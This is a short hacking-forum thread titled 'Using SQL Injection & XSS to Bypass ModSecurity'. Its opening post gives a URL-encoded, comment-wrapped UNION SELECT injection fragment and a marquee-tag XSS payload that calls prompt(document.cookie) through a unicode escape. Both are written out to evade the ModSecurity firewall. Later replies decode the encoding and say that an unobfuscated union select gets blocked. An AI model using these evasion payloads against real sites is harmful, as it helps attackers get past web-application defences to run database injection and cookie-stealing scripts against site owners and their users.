Welcome!

Welcome to the 1337pwn community forums. Register now for an account.

Register Now

Announcement

Collapse
No announcement yet.

Using SQL Injection & XSS to Bypass ModSecurity

Collapse
X
 
  • Filter
  • Time
  • Show
Clear All
new posts

    Using SQL Injection & XSS to Bypass ModSecurity

    Effective SQLi to Bypass ModSecurity:

    Code:
    /*!50000%75%6e%69on*/ %73%65%6cect 1,2,3,4... --
    Effective XSS to Bypass ModSecurity:

    Code:
    <marquee loop=1 width=0 onfinish=pr\u006fmpt(document.cookie)>1337pwn</marquee>

    #2
    Thx but i need more information about Sqli

    Comment


      #3
      Originally posted by MoneyLuck View Post
      Thx but i need more information about Sqli
      %75%6e%69on = union
      %73%65%6cect = select

      %75%6e%69 = uni = URL encode
      %73%65%6c = sel = URL encode

      Comment


        #4
        If you just use regular Union select 1,2,3,4,...--, it will be blocked by ModSecurity.

        Comment

        Working...
        X